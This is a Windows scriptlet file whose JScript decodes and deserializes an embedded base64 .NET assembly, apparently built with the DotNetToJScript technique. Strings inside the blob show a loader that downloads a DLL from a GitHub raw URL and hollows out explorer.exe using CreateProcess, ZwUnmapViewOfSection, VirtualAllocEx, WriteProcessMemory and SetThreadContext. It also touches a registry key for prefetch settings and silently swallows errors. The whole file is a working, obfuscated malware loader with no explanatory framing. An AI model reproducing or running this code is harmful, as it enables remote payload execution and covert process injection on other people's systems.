<?XML version="1.0"?>
<scriptlet>

<registration
    progid="Test"
    classid="{F0000000-0000-0000-0000-000000000001}" >
</registration>

<script language="JScript">
<![CDATA[

function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
        var enc = new ActiveXObject("System.Text.ASCIIEncoding");
        var length = enc.GetByteCount_2(b);
        var ba = enc.GetBytes_4(b);
        var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
        ba = transform.TransformFinalBlock(ba, 0, length);
        var ms = new ActiveXObject("System.IO.MemoryStream");
        ms.Write(ba, 0, (length / 4) * 3);
        ms.Position = 0;
        return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACAAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAShkTagAAAAAA"+
"AAAA4AAiIAsBMAAAFgAAAAgAAAAAAABSNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADUA"+
"AE8AAAAAQAAADAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAMgzAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAABYFQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAADAQAAABA"+
"AAAABgAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAeAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAADQ1AAAAAAAASAAAAAIABQCoJAAAIA8AAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGzAEAC4AAAAB"+
"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"+
"AL0EAAACANQEAAADAMQCAAAEAAQBAAAFAP0EAAABAL0EAAACAMYEAAADAL8DAAAEAL4CAAAFAFgD"+
"AAABALcAAAACAMgEAAABAHsAAAACAFsFAAABAHsAAAACAFsFAAABAHsAAAABAMUAAAABAJgAAAAC"+
"ABIFAAABAMsCAAACABIFCQDVAwEAEQDVAwYAGQDVAwoAKQDVAxAAMQDVAxAAOQDVAxAAQQDVAxAA"+
"SQDVAxAAUQDVAxAAWQDVAxAAYQDVAxUAaQDVAxAAcQDVAxAAeQDVAwYAsQBCATgAsQAlAT4AuQAy"+
"A0MAoQDVAwYAmQBJAUgAmQBpAFAAoQB0BVgAyQAxAQYA0QD3AIQAqQB8BYgAqQCsAo8AqQCgApQA"+
"2QARAJoA2QBDAKAA2QAmAKYA4QDwBawA4QDoBLEA6QDTBbgA2QAbALwA8QC6A8MA+QCjBcYACQGH"+
"BNMA2QAmANkA2QAwAN8A2QDkAuYAqQC1AusA8QA7APoA8QDVA/4A2QDXAggBDgANAAAALgALAHAB"+
"LgATAHkBLgAbAJgBLgAjAKEBLgArALYBLgAzAOABLgA7AOABLgBDAKEBLgBLAOYBLgBTAOABLgBb"+
"AOABLgBjAAsCLgBrADUCQwBbAEICGgAiACcAXQDxAPQAAwH4AgUDAAELAK8EAQAAAQ0AZQUBAAAB"+
"DwCtBQEAAAERAHsDAgAAARMASgUBAAABFQA5BQEAAAEXAG4AAQAAARkAqwABAASAAAABAAAAAAAA"+
"AAAAAAAAAJMFAAACAAAAAAAAAAAAAAANAWAAAAAAAAIAAAAAAAAAAAAAAA0BUQMAAAAAAAAATWlj"+
"cm9zb2Z0LldpbjMyAFJlYWRJbnQzMgBXcml0ZUludDMyAFJlYWRJbnQ2NABXcml0ZUludDY0AFRv"+
"SW50NjQAUmVhZEludDE2ADxNb2R1bGU+AFN5c3RlbS5JTwBtc2NvcmxpYgBSZWFkAFJlc3VtZVRo"+
"cmVhZABoVGhyZWFkAExvYWQARG93bmxvYWRQYXlsb2FkAHNvdXJjZQBJRGlzcG9zYWJsZQBDbG9z"+
"ZUhhbmRsZQBQcm9jZXNzSGFuZGxlAGhhbmRsZQB0YXJnZXRmaWxlAGxwQXBwbGljYXRpb25OYW1l"+
"AGxwQ29tbWFuZExpbmUATG9jYWxNYWNoaW5lAGZsQWxsb2NhdGlvblR5cGUASHR0cFdlYlJlc3Bv"+
"bnNlAEdldFJlc3BvbnNlAERpc3Bvc2UAQWxsb2NhdGUAQ3JlYXRlAFdyaXRlAEd1aWRBdHRyaWJ1"+
"dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVB"+
"dHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0"+
"dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlv"+
"bkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVj"+
"dEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRy"+
"aWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBEZWxldGVWYWx1ZQBHZXRW"+
"YWx1ZQBTZXRWYWx1ZQBuU2l6ZQBkd1NpemUAc2l6ZQBTdHJpbmcAQWxsb2NIR2xvYmFsAEZyZWVI"+
"R2xvYmFsAE1hcnNoYWwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABFeGFtcGxlQXNzZW1ibHkuZGxs"+
"AHBheWxvYWRVcmwAdXJsAEdldFJlc3BvbnNlU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0Ad3Jp"+
"dHRlbgBBbGlnbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBad1VubWFwVmlld09mU2VjdGlvbgBTeXN0"+
"ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24AbHBTdGFydHVwSW5mbwBaZXJvAGxwQnVmZmVyAEJpdENv"+
"bnZlcnRlcgAuY3RvcgBJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLklu"+
"dGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01v"+
"ZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRl"+
"cwBwYXlsb2FkQnl0ZXMAR2V0Qnl0ZXMAZHdDcmVhdGlvbkZsYWdzAGFyZ3MAVGVzdENsYXNzAENy"+
"ZWF0ZVByb2Nlc3MAaFByb2Nlc3MAbHBCYXNlQWRkcmVzcwBscEFkZHJlc3MAYXJndW1lbnRzAENv"+
"bmNhdABPYmplY3QASW5qZWN0AGZsUHJvdGVjdABTeXN0ZW0uTmV0AGFsaWdubWVudABscEVudmly"+
"b25tZW50AEh0dHBXZWJSZXF1ZXN0AEdldFRocmVhZENvbnRleHQAU2V0VGhyZWFkQ29udGV4dABs"+
"cENvbnRleHQAVmlydHVhbEFsbG9jRXgAVG9BcnJheQBPcGVuU3ViS2V5AFJlZ2lzdHJ5S2V5AEV4"+
"YW1wbGVBc3NlbWJseQBCbG9ja0NvcHkAV3JpdGVQcm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVj"+
"dG9yeQBHZXRDdXJyZW50RGlyZWN0b3J5AFJlZ2lzdHJ5AElzTnVsbE9yRW1wdHkAAAAAgJNoAHQA"+
"dABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBj"+
"AG8AbQAvAGoAbwBiAGIAeQBnAG8AYQB0AC8AdABlAHMAdAAvAG0AYQBpAG4ALwBDAHUAcwB0AG8A"+
"bQBNAGEAcgBzAGgAYQBsAGUAcgAuAGQAbABsAAAZZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAAAEA"+
"gKtTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBu"+
"AHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAA"+
"TQBhAG4AYQBnAGUAbQBlAG4AdABcAFAAcgBlAGYAZQB0AGMAaABQAGEAcgBhAG0AZQB0AGUAcgBz"+
"AAAhRQBuAGEAYgBsAGUAUAByAGUAZgBlAHQAYwBoAGUAcgAAAyAAAAAAAMv4CpqAa6tHmX9CSet1"+
"wS0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgcHBA4ODhJBBAcBHQUQBwgSRRJJEk0SUR0FCAId"+
"BQUAARJZDgQgABJdBCAAEk0HIAMBHQUICAcgAwgdBQgIBCAAHQUmBx0cCgYGCAgICB0FHQUYDg4K"+
"Ch0FChJVAgIGHQUICAgdBQISVQIDBhJVBiACElUOAgQgARwOBSACAQ4CBQACCBwIBQACBhwIBQAC"+
"ChwIBAABAg4GAAMODg4OAwAADgYAAwEYCAgCBhgMAAUBEoCBCBKAgQgIBQABHQUKBQACChgIBgAD"+
"ARgICgQAAQEYBSACAQ4cAgYOBQcDCgoYAyAACgQgAQEKBAcCGBgEAAEYCAi3elxWGTTgiQYgAwEO"+
"Dg4FAAEdBQ4HAAMBHQUODg8ACgIODhgYAgkYDh0FHQUIAAUKCgoKCQkJAAUKCgodBQgKBQACCQoK"+
"BQACAgoYBAABCQoEAAECCgUAAhgYCAUAAhgICAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2Vw"+
"dGlvblRocm93cwEIAQAHAQAAAAAUAQAPRXhhbXBsZUFzc2VtYmx5AAApAQAkRXhhbXBsZSBBc3Nl"+
"bWJseSBmb3IgRG90TmV0VG9KU2NyaXB0AAAFAQAAAAAkAQAfQ29weXJpZ2h0IMKpIEphbWVzIEZv"+
"cnNoYXcgMjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEA"+
"BzEuMC4wLjAAAAUBAAEAAAAAAABKGRNqAAAAAAIAAAAcAQAA5DMAAOQVAABSU0RTcQJdBjovwUS5"+
"DIBgywDqowEAAABDOlxVc2Vyc1xvYmxpZlxPbmVEcml2ZVxEZXNrdG9wXERvdE5ldFRvSlNjcmlw"+
"dFxFeGFtcGxlQXNzZW1ibHlcb2JqXERlYnVnXEV4YW1wbGVBc3NlbWJseS5wZGIAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg1AAAAAAAAAAAAAEI1"+
"AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0NQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29y"+
"ZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+
"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAsAMAAAAAAAAAAAAAsAM0AAAAVgBTAF8A"+
"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+
"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+
"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBBADAAABAFMAdAByAGkAbgBnAEYAaQBs"+
"AGUASQBuAGYAbwAAAOwCAAABADAAMAAwADAAMAA0AGIAMAAAAGIAJQABAEMAbwBtAG0AZQBuAHQA"+
"cwAAAEUAeABhAG0AcABsAGUAIABBAHMAcwBlAG0AYgBsAHkAIABmAG8AcgAgAEQAbwB0AE4AZQB0"+
"AFQAbwBKAFMAYwByAGkAcAB0AAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAA"+
"AABIABAAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AGEAbQBwAGwAZQBB"+
"AHMAcwBlAG0AYgBsAHkAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4A"+
"MAAuADAAAABIABQAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABhAG0AcABsAGUAQQBz"+
"AHMAZQBtAGIAbAB5AC4AZABsAGwAAABiAB8AAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA"+
"AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIABKAGEAbQBlAHMAIABGAG8AcgBzAGgAYQB3ACAAMgAw"+
"ADEANwAAAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABQABQA"+
"AQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQB4AGEAbQBwAGwAZQBBAHMAcwBl"+
"AG0AYgBsAHkALgBkAGwAbAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAARQB4AGEA"+
"bQBwAGwAZQBBAHMAcwBlAG0AYgBsAHkAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBv"+
"AG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A"+
"bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAMAAADAAAAFQ1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZsZWN0aW9u"+
"LkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'TestClass';

try {
        setversion();
        var stm = base64ToStream(serialized_obj);
        var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
        var al = new ActiveXObject('System.Collections.ArrayList');
        var d = fmt.Deserialize_2(stm);
        al.Add(undefined);
        var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

} catch (e) {
    debug(e.message);
}

]]>
</script>

</scriptlet>


